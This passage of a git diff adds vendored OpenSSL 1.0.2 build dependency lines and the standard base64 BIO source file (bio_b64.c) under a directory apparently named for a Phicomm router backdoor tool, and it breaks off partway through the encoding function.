+m_mdc2.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_mdc2.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_mdc2.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_mdc2.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+m_mdc2.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_mdc2.o: ../cryptlib.h evp_locl.h m_mdc2.c
+m_null.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_null.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_null.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_null.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_null.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_null.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_null.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_null.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_null.o: ../cryptlib.h m_null.c
+m_ripemd.o: ../../e_os.h ../../include/openssl/asn1.h
+m_ripemd.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_ripemd.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_ripemd.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_ripemd.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_ripemd.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_ripemd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_ripemd.o: ../../include/openssl/pkcs7.h ../../include/openssl/ripemd.h
+m_ripemd.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+m_ripemd.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_ripemd.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_ripemd.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+m_ripemd.o: m_ripemd.c
+m_sha.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_sha.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_sha.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_sha.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_sha.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_sha.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_sha.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_sha.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+m_sha.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_sha.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_sha.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h m_sha.c
+m_sha1.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_sha1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_sha1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_sha1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_sha1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_sha1.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_sha1.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+m_sha1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_sha1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_sha1.o: ../cryptlib.h m_sha1.c
+m_sigver.o: ../../e_os.h ../../include/openssl/asn1.h
+m_sigver.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_sigver.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_sigver.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_sigver.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_sigver.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_sigver.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_sigver.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+m_sigver.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_sigver.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_sigver.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+m_sigver.o: m_sigver.c
+m_wp.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_wp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_wp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_wp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_wp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_wp.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_wp.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_wp.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_wp.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_wp.o: ../../include/openssl/whrlpool.h ../../include/openssl/x509.h
+m_wp.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h m_wp.c
+names.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+names.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+names.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+names.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+names.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+names.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+names.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+names.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+names.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+names.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+names.o: ../cryptlib.h names.c
+p5_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_crpt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p5_crpt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p5_crpt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p5_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p5_crpt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p5_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_crpt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p5_crpt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_crpt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_crpt.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p5_crpt.c
+p5_crpt2.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_crpt2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p5_crpt2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p5_crpt2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p5_crpt2.o: ../../include/openssl/hmac.h ../../include/openssl/lhash.h
+p5_crpt2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_crpt2.o: ../../include/openssl/opensslconf.h
+p5_crpt2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_crpt2.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p5_crpt2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_crpt2.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_crpt2.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+p5_crpt2.o: p5_crpt2.c
+p_dec.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_dec.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_dec.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_dec.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_dec.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_dec.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_dec.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_dec.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_dec.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_dec.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_dec.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_dec.o: ../cryptlib.h p_dec.c
+p_enc.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_enc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_enc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_enc.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_enc.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_enc.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_enc.o: ../cryptlib.h p_enc.c
+p_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+p_lib.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+p_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+p_lib.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+p_lib.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+p_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+p_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_lib.o: ../asn1/asn1_locl.h ../cryptlib.h p_lib.c
+p_open.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_open.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_open.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_open.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_open.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_open.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_open.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_open.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+p_open.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p_open.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p_open.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p_open.c
+p_seal.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_seal.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_seal.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_seal.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_seal.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_seal.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_seal.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_seal.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_seal.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_seal.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_seal.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_seal.o: ../cryptlib.h p_seal.c
+p_sign.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_sign.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_sign.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_sign.o: ../cryptlib.h p_sign.c
+p_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+p_verify.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p_verify.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p_verify.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p_verify.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p_verify.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p_verify.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p_verify.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p_verify.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p_verify.c
+pmeth_fn.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_fn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pmeth_fn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pmeth_fn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pmeth_fn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pmeth_fn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pmeth_fn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_fn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_fn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_fn.o: pmeth_fn.c
+pmeth_gn.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_gn.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+pmeth_gn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pmeth_gn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pmeth_gn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pmeth_gn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pmeth_gn.o: ../../include/openssl/opensslconf.h
+pmeth_gn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_gn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_gn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_gn.o: pmeth_gn.c
+pmeth_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pmeth_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pmeth_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pmeth_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pmeth_lib.o: ../../include/openssl/objects.h
+pmeth_lib.o: ../../include/openssl/opensslconf.h
+pmeth_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_lib.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+pmeth_lib.o: evp_locl.h pmeth_lib.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.c
new file mode 100644
index 0000000..538b520
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.c
@@ -0,0 +1,573 @@
+/* crypto/evp/bio_b64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+
+static int b64_write(BIO *h, const char *buf, int num);
+static int b64_read(BIO *h, char *buf, int size);
+static int b64_puts(BIO *h, const char *str);
+/*
+ * static int b64_gets(BIO *h, char *str, int size);
+ */
+static long b64_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int b64_new(BIO *h);
+static int b64_free(BIO *data);
+static long b64_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+#define B64_BLOCK_SIZE  1024
+#define B64_BLOCK_SIZE2 768
+#define B64_NONE        0
+#define B64_ENCODE      1
+#define B64_DECODE      2
+
+typedef struct b64_struct {
+    /*
+     * BIO *bio; moved to the BIO structure
+     */
+    int buf_len;
+    int buf_off;
+    int tmp_len;                /* used to find the start when decoding */
+    int tmp_nl;                 /* If true, scan until '\n' */
+    int encode;
+    int start;                  /* have we started decoding yet? */
+    int cont;                   /* <= 0 when finished */
+    EVP_ENCODE_CTX base64;
+    char buf[EVP_ENCODE_LENGTH(B64_BLOCK_SIZE) + 10];
+    char tmp[B64_BLOCK_SIZE];
+} BIO_B64_CTX;
+
+static BIO_METHOD methods_b64 = {
+    BIO_TYPE_BASE64, "base64 encoding",
+    b64_write,
+    b64_read,
+    b64_puts,
+    NULL,                       /* b64_gets, */
+    b64_ctrl,
+    b64_new,
+    b64_free,
+    b64_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_base64(void)
+{
+    return (&methods_b64);
+}
+
+static int b64_new(BIO *bi)
+{
+    BIO_B64_CTX *ctx;
+
+    ctx = (BIO_B64_CTX *)OPENSSL_malloc(sizeof(BIO_B64_CTX));
+    if (ctx == NULL)
+        return (0);
+
+    ctx->buf_len = 0;
+    ctx->tmp_len = 0;
+    ctx->tmp_nl = 0;
+    ctx->buf_off = 0;
+    ctx->cont = 1;
+    ctx->start = 1;
+    ctx->encode = 0;
+
+    bi->init = 1;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    bi->num = 0;
+    return (1);
+}
+
+static int b64_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int b64_read(BIO *b, char *out, int outl)
+{
+    int ret = 0, i, ii, j, k, x, n, num, ret_code = 0;
+    BIO_B64_CTX *ctx;
+    unsigned char *p, *q;
+
+    if (out == NULL)
+        return (0);
+    ctx = (BIO_B64_CTX *)b->ptr;
+
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+
+    BIO_clear_retry_flags(b);
+
+    if (ctx->encode != B64_DECODE) {
+        ctx->encode = B64_DECODE;
+        ctx->buf_len = 0;
+        ctx->buf_off = 0;
+        ctx->tmp_len = 0;
+        EVP_DecodeInit(&(ctx->base64));
+    }
+
+    /* First check if there are bytes decoded/encoded */
+    if (ctx->buf_len > 0) {
+        OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+        i = ctx->buf_len - ctx->buf_off;
+        if (i > outl)
+            i = outl;
+        OPENSSL_assert(ctx->buf_off + i < (int)sizeof(ctx->buf));
+        memcpy(out, &(ctx->buf[ctx->buf_off]), i);
+        ret = i;
+        out += i;
+        outl -= i;
+        ctx->buf_off += i;
+        if (ctx->buf_len == ctx->buf_off) {
+            ctx->buf_len = 0;
+            ctx->buf_off = 0;
+        }
+    }
+
+    /*
+     * At this point, we have room of outl bytes and an empty buffer, so we
+     * should read in some more.
+     */
+
+    ret_code = 0;
+    while (outl > 0) {
+        if (ctx->cont <= 0)
+            break;
+
+        i = BIO_read(b->next_bio, &(ctx->tmp[ctx->tmp_len]),
+                     B64_BLOCK_SIZE - ctx->tmp_len);
+
+        if (i <= 0) {
+            ret_code = i;
+
+            /* Should we continue next time we are called? */
+            if (!BIO_should_retry(b->next_bio)) {
+                ctx->cont = i;
+                /* If buffer empty break */
+                if (ctx->tmp_len == 0)
+                    break;
+                /* Fall through and process what we have */
+                else
+                    i = 0;
+            }
+            /* else we retry and add more data to buffer */
+            else
+                break;
+        }
+        i += ctx->tmp_len;
+        ctx->tmp_len = i;
+
+        /*
+         * We need to scan, a line at a time until we have a valid line if we
+         * are starting.
+         */
+        if (ctx->start && (BIO_get_flags(b) & BIO_FLAGS_BASE64_NO_NL)) {
+            /* ctx->start=1; */
+            ctx->tmp_len = 0;
+        } else if (ctx->start) {
+            q = p = (unsigned char *)ctx->tmp;
+            num = 0;
+            for (j = 0; j < i; j++) {
+                if (*(q++) != '\n')
+                    continue;
+
+                /*
+                 * due to a previous very long line, we need to keep on
+                 * scanning for a '\n' before we even start looking for
+                 * base64 encoded stuff.
+                 */
+                if (ctx->tmp_nl) {
+                    p = q;
+                    ctx->tmp_nl = 0;
+                    continue;
+                }
+
+                k = EVP_DecodeUpdate(&(ctx->base64),
+                                     (unsigned char *)ctx->buf,
+                                     &num, p, q - p);
+                if ((k <= 0) && (num == 0) && (ctx->start))
+                    EVP_DecodeInit(&ctx->base64);
+                else {
+                    if (p != (unsigned char *)
+                        &(ctx->tmp[0])) {
+                        i -= (p - (unsigned char *)
+                              &(ctx->tmp[0]));
+                        for (x = 0; x < i; x++)
+                            ctx->tmp[x] = p[x];
+                    }
+                    EVP_DecodeInit(&ctx->base64);
+                    ctx->start = 0;
+                    break;
+                }
+                p = q;
+            }
+
+            /* we fell off the end without starting */
+            if ((j == i) && (num == 0)) {
+                /*
+                 * Is this is one long chunk?, if so, keep on reading until a
+                 * new line.
+                 */
+                if (p == (unsigned char *)&(ctx->tmp[0])) {
+                    /* Check buffer full */
+                    if (i == B64_BLOCK_SIZE) {
+                        ctx->tmp_nl = 1;
+                        ctx->tmp_len = 0;
+                    }
+                } else if (p != q) { /* finished on a '\n' */
+                    n = q - p;
+                    for (ii = 0; ii < n; ii++)
+                        ctx->tmp[ii] = p[ii];
+                    ctx->tmp_len = n;
+                }
+                /* else finished on a '\n' */
+                continue;
+            } else {
+                ctx->tmp_len = 0;
+            }
+        } else if ((i < B64_BLOCK_SIZE) && (ctx->cont > 0)) {
+            /*
+             * If buffer isn't full and we can retry then restart to read in
+             * more data.
+             */
+            continue;
+        }
+
+        if (BIO_get_flags(b) & BIO_FLAGS_BASE64_NO_NL) {
+            int z, jj;
+
+#if 0
+            jj = (i >> 2) << 2;
+#else
+            jj = i & ~3;        /* process per 4 */
+#endif
+            z = EVP_DecodeBlock((unsigned char *)ctx->buf,
+                                (unsigned char *)ctx->tmp, jj);
+            if (jj > 2) {
+                if (ctx->tmp[jj - 1] == '=') {
+                    z--;
+                    if (ctx->tmp[jj - 2] == '=')
+                        z--;
+                }
+            }
+            /*
+             * z is now number of output bytes and jj is the number consumed
+             */
+            if (jj != i) {
+                memmove(ctx->tmp, &ctx->tmp[jj], i - jj);
+                ctx->tmp_len = i - jj;
+            }
+            ctx->buf_len = 0;
+            if (z > 0) {
+                ctx->buf_len = z;
+            }
+            i = z;
+        } else {
+            i = EVP_DecodeUpdate(&(ctx->base64),
+                                 (unsigned char *)ctx->buf, &ctx->buf_len,
+                                 (unsigned char *)ctx->tmp, i);
+            ctx->tmp_len = 0;
+        }
+        ctx->buf_off = 0;
+        if (i < 0) {
+            ret_code = 0;
+            ctx->buf_len = 0;
+            break;
+        }
+
+        if (ctx->buf_len <= outl)
+            i = ctx->buf_len;
+        else
+            i = outl;
+
+        memcpy(out, ctx->buf, i);
+        ret += i;
+        ctx->buf_off = i;
+        if (ctx->buf_off == ctx->buf_len) {
+            ctx->buf_len = 0;
+            ctx->buf_off = 0;
+        }
+        outl -= i;
+        out += i;
+    }
+    /* BIO_clear_retry_flags(b); */
+    BIO_copy_next_retry(b);
+    return ((ret == 0) ? ret_code : ret);
+}
+
+static int b64_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0;
+    int n;
+    int i;
+    BIO_B64_CTX *ctx;
+
+    ctx = (BIO_B64_CTX *)b->ptr;
+    BIO_clear_retry_flags(b);
+
+    if (ctx->encode != B64_ENCODE) {
+        ctx->encode = B64_ENCODE;
+        ctx->buf_len = 0;
+        ctx->buf_off = 0;
+        ctx->tmp_len = 0;
+        EVP_EncodeInit(&(ctx->base64));
+    }
+
+    OPENSSL_assert(ctx->buf_off < (int)sizeof(ctx->buf));
+    OPENSSL_assert(ctx->buf_len <= (int)sizeof(ctx->buf));
+    OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+    n = ctx->buf_len - ctx->buf_off;
+    while (n > 0) {
+        i = BIO_write(b->next_bio, &(ctx->buf[ctx->buf_off]), n);
+        if (i <= 0) {
+            BIO_copy_next_retry(b);
+            return (i);
+        }
+        OPENSSL_assert(i <= n);
+        ctx->buf_off += i;
+        OPENSSL_assert(ctx->buf_off <= (int)sizeof(ctx->buf));
+        OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+        n -= i;
+    }
+    /* at this point all pending data has been written */
+    ctx->buf_off = 0;
+    ctx->buf_len = 0;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+
+    while (inl > 0) {
+        n = (inl > B64_BLOCK_SIZE) ? B64_BLOCK_SIZE : inl;
+
+        if (BIO_get_flags(b) & BIO_FLAGS_BASE64_NO_NL) {
+            if (ctx->tmp_len > 0) {
+                OPENSSL_assert(ctx->tmp_len <= 3);
+                n = 3 - ctx->tmp_len;
+                /*
+                 * There's a theoretical possibility for this
+                 */
+                if (n > inl)
+                    n = inl;
+                memcpy(&(ctx->tmp[ctx->tmp_len]), in, n);
+                ctx->tmp_len += n;
+                ret += n;
+                if (ctx->tmp_len < 3)
+                    break;
+                ctx->buf_len =
+                    EVP_EncodeBlock((unsigned char *)ctx->buf,
+                                    (unsigned char *)ctx->tmp, ctx->tmp_len);
+                OPENSSL_assert(ctx->buf_len <= (int)sizeof(ctx->buf));
